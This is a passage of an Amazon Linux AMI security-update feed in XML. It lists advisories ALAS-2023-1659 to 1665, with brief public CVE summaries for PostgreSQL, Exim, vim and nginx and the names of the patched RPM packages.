/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23214:
When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23214" title="" id="CVE-2021-23214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-contrib" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.25" release="1.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.25-1.73.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.25-1.73.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.25" release="1.73.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.25-1.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1659</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1659: medium priority package update for postgresql94</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23214:
When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23214" title="" id="CVE-2021-23214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql94-plperl" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.26" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.26-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.26-1.78.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.26" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.26-1.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1660</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1660: medium priority package update for postgresql95</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23214:
When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23214" title="" id="CVE-2021-23214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql95-plpython26" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.24" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.24-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.24-1.83.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.24" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.24-1.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1661</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1661: medium priority package update for postgresql96</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-23214:
When the server is configured to use trust authentication with a clientcert requirement or to use cert authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23214" title="" id="CVE-2021-23214" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-plpython27" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.24" release="1.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.24-1.86.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-test" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.24-1.86.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.24" release="1.86.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.24-1.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1662</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1662: important priority package update for exim</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-3559:
A vulnerability was found in Exim and classified as problematic. This issue affects some unknown processing of the component Regex Handler. The manipulation leads to use after free. The name of the patch is 4e9ed49f8f12eb331b29bd5b6dc3693c520fddc2. It is recommended to apply a patch to fix this issue. The identifier VDB-211073 was assigned to this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3559" title="" id="CVE-2022-3559" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mon" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.34.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.34.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.34.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.34.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.34.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.34.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1663</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1663: important priority package update for vim</title><issued date="2023-01-18 20:56:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-3705:
A vulnerability was found in vim and classified as problematic. Affected by this issue is the function qf_update_buffer of the file quickfix.c of the component autocmd Handler. The manipulation leads to use after free. The attack may be launched remotely. Upgrading to version 9.0.0805 is able to address this issue. The name of the patch is d0fab10ed2a86698937e3c3fed2f10bd9bb5e731. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-212324.
CVE-2022-3591:
Use After Free in GitHub repository vim/vim prior to 9.0.0789.
CVE-2022-3520:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0765.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3520" title="" id="CVE-2022-3520" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3591" title="" id="CVE-2022-3591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3705" title="" id="CVE-2022-3705" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-debuginfo" version="9.0.828" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.828-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.828" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.828-1.1.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.828" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.828-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.828" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.828-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.828" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.828-1.1.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.828" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.828-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.828" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.828-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.828" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.828-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.828" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.828-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.828" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.828-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1664</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1664: medium priority package update for vim</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-4141:
The target's backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4141" title="" id="CVE-2022-4141" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-minimal" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1006-1.1.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1006-1.1.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1006-1.1.amzn1.noarch.rpm</filename></package><package name="vim-minimal" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1006-1.1.amzn1.i686.rpm</filename></package><package name="vim-common" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1006-1.1.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1006-1.1.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1006" release="1.1.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1006-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1665</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1665: medium priority package update for nginx</title><issued date="2023-01-18 20:56:00" /><updated date="2023-01-24 17:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41742:
NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to cause a worker process crash, or might result in worker process memory disclosure by using a specially crafted audio or video file. The issue affects only NGINX products that are built with the module ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module.
CVE-2022-41741:
NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to corrupt NGINX worker memory, resulting in its termination or potential other impact using a specially crafted audio or video file. The issue affects only NGINX products that are built with the ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module.
